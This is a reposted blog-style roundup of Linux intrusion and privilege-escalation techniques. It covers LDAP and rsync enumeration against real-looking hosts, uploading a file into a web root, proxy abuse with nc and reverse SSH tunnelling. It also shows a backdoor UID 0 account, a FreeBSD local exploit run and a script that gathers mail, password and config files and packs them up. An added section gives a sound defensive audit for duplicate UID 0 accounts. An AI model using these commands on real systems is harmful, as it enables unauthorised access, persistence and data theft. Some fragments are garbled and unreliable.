Linux *** and privilege escalation: technique roundup


Common paths on Linux systems:

Linux privilege escalation *** techniques, Part 1: LDAP *** techniques:
1. cat /etc/nsswitch

Looking at the password lookup policy shows that the "files ldap" mode is in use.
2. less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net

Locate the ou, dc, dc settings.
3. Look up administrator information
Anonymous mode:
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

Password mode:
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4. Search for 10 user records
ldapsearch -h 192.168.2.2 -x -z 10 -p <port>    (-p: the port to connect to)

*** in practice:
1. Return all attributes
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous

2. Show the base object
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

3. Search with an empty base DN
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn

 
Linux privilege escalation *** techniques, Part 2: NFS *** techniques:
List the exports of a host:
showmount -e ip
Linux privilege escalation *** techniques, Part 3: rsync *** techniques:
1. Display the module list of an rsync server.
rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book

Look at the corresponding subdirectory (the module name must be followed by a trailing /):
rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2. Download configuration files from the rsync server
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3. Update a file via rsync (the upload succeeds, but does not overwrite)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt

Linux privilege escalation *** techniques, Part 4: squid *** techniques:
nc -vv  80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0

Linux privilege escalation *** techniques, Part 5: SSH port forwarding:
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

Linux privilege escalation *** techniques, Part 6: Joomla *** techniques:
Determine the version:
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

Password reset:
index.php?option=com_user&view=reset&layout=confirm

Linux privilege escalation *** techniques, Part 7: adding a root-equivalent user with UID 0 on Linux:
useradd -o -u 0 nothack
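A detection check for the account the command above creates, added here as an example that is not part of the original post: it flags every passwd entry other than root that carries UID 0, and more generally any UID shared by more than one account. The passwd content is constructed sample data; on a live host run the functions against /etc/passwd.

```shell
#!/bin/sh
# Added example: audit a passwd file for the kind of account that
# `useradd -o -u 0 <name>` creates (a second UID 0 login) and, more
# generally, for any UID that is shared by more than one account.

# Print every account other than root whose UID is 0.
find_uid0_aliases() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print every UID that appears on more than one passwd line, as "uid:name,name".
find_duplicate_uids() {
    awk -F: '
        { count[$3]++; names[$3] = (names[$3] == "" ? $1 : names[$3] "," $1) }
        END { for (u in count) if (count[u] > 1) print u ":" names[u] }
    ' "$1" | sort -n
}

# Constructed sample passwd (not taken from a real system).
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nothack:x:0:0::/home/nothack:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc:x:33:33::/var/svc:/bin/sh
EOF

echo "UID 0 accounts other than root:"
find_uid0_aliases "$SAMPLE_PASSWD"
echo "UIDs shared by more than one account:"
find_duplicate_uids "$SAMPLE_PASSWD"
```

The first function prints nothack; the second prints the UID 0 pair and the shared UID 33, which is what a periodic integrity check or SIEM rule over /etc/passwd should alert on.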

Linux privilege escalation *** techniques, Part 8: FreeBSD local privilege escalation:
[argp@julius ~]$ uname -rsi
freebsd 7.3-RELEASE GENERIC
[argp@julius ~]$ sysctl vfs.usermount
vfs.usermount: 1
[argp@julius ~]$ id
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
[argp@julius ~]$ ./nfs_mount_ex
calling nmount()

Packaging a folder with tar:
1. tar packaging:
tar -cvf /home/public_html/*.tar /home/public_html/ --exclude=*.gif /xx/xx/*
alzip (  ): alzip -a D:/WEB d:/web*.rar

Note:
On the tar packaging method: Linux does not determine a file's type from its extension.
When compressing, tar -ztf *.tar.gz lists the contents of the archive and tar -zxf *.tar.gz extracts it.
So it is better to use this:
tar -czf /home/public_html/*.tar.gz /home/public_html/ --exclude=*.gif /xx/xx/*
System information collection:
for linux:
#!/bin/bash
echo "#######getting sysinfo####"
echo "######usage: ./getinfo.sh >/tmp/sysinfo.txt"
echo "#######basic information##"
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo "ur id is $(id)"
echo "###atq&crontab#####"
atq
crontab -l
echo "#####about var#####"
set
echo "#####about network###"
####this is the point in a pentest, but i am a new bird, so u need to add some to it
cat /etc/hosts
hostname
ifconfig -a
arp -v
echo "########user####"
cat /etc/passwd | grep -i sh
echo "######service####"
chkconfig --list
for i in oracle mysql tomcat samba apache ftp; do
    cat /etc/passwd | grep -i "$i"
done
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>/dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5
###maybe can use "tree /"###
echo "##packing up#########"
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

Reposted from: https://blog.51cto.com/0daysec/1571871